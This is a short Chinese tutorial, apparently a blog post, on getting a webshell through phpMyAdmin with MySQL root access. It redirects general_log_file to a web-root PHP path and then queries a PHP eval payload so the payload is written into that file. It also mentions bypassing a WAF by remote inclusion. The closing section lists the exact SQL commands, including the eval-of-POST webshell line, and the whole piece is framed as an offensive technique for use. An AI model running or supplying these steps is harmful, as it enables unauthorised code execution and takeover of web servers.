phpmyadmin的getshell新姿势

0x1

目前into outfile已经被禁用,并且WAF也会在写入文件的时候拦截。
那么我们尝试通过一个脑洞大开的方法去getshell。
(必须是mysql root权限)

登录phpmyadmin后,查看全局变量:
找到 general log file

找到 general log file

这里是存储了每一个sql语句执行的日志(包含SQL语句本身)

但是general log变量必须是ON状态,代表启用。

此时我们把general log开启为ON,然后再去更改general log file的地址为我们的webshell绝对路径。

在每一次更改general log file的时候mysql都会判断日志文件是否存在,如果不存在则会自动创建。

此时该文件已经创建,并且文件内容保存了最后一条SQL语句的日志信息。

MySQLa, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
121 Query SHOW GLOBAL VARIABLES WHERE Variable_name="general_log_file"
121 Quit

接下来,我们直接随意查询SQL,每一句都会被写入这个shell.php

由于有WAF,我们采用远程包含的形式来运行webshell。
在我们的远程地址里,放置函数名,使服务器端访问它,然后加载到内存,直接去调用此函数,再去接收我们提交的php代码。

0x02

show variables like '%general%';  #查看配置
SET GLOBAL general_log='on'  #开启general log模式
SET GLOBAL general_log_file='/var/www/html/1.php'                
#设置日志目录为shell地址
SELECT '<?php eval($_POST["test"]);?>'  #写入shell
SET GLOBAL general_log='off'


发表评论

电子邮件地址不会被公开。 必填项已用*标注